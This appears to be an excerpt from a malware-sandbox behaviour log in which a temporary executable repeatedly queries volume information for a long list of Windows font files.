            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformationJump to behavior
